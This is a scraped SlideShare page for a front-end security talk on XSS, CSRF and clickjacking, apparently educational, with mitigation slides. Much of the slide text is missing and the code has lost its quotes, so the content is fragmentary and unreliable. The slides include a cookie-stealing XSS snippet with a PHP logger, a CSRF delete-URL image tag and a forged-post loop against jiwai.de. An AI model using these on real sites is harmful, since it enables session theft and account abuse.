Your SlideShare is downloading. ×
0
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

F2e security

1,943

Published on

Published in: Technology, Design
0 Comments
18 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,943
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
207
Comments
0
Likes
18
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  1. 2
  2. 3
  3. 4
  4. • – – –••
  5. Cross-site scripting XSS
  6. XSS
  7. • Cookie• DOM••…
  8. Yupoo XSS
  9. alert
  10. Javascriptvar img = new Image();img.src = get_cookie.php?var=+encodeURI(document.cookie); PHP<?phpif (isset($_GET[var])) { file_put_contents(./cookie/.time()..txt,urldecode($_GET[var]));}
  11. “ ”
  12. • Filter input,Escape output• Cookie• noscript?
  13. ••
  14. • http://en.wikipedia.org/wiki/Cross-site_scripting• http://www.gracecode.com/archives/2517• http://www.gracecode.com/archives/2491• http://ha.ckers.org/xss.html• http://www.xssed.com/
  15. CSRF Cross Site Request Forgery
  16. <img src=“http://.../del.php?id=64” />
  17. <form action="http://jiwai.de/wo/status/update" method="post"> <textarea name="jw_status"></textarea> <input type="submit" /> </form>
  18. •• GET POST•
  19. setInterval(function() { var img = new Image(); var message = ; var api = http://jiwai.de/wo/status/ update; img.src = api + ?jw_status= + message + &t= + +new Date();}, 1000);
  20. “ ”
  21. • GET POST Cookie• Referer• Token•
  22. • _tb_token_• Referer
  23. • http://en.wikipedia.org/wiki/Cross-site_request_forgery• http://www.cgisecurity.com/csrf-faq.html• http://www.80sec.com/csrf-securit.html• http://www.playhack.net/view.php?id=31
  24. Twitter Clickjacking
  25. 1. iframe Twitter 02. “ ”3. Twitter
  26. ••
  27. CSRF
  28. Cookie Session
  29. • “JS ”••
  30. Q&A
  31. alert(/tHx/).replace(/.+/, eval);

×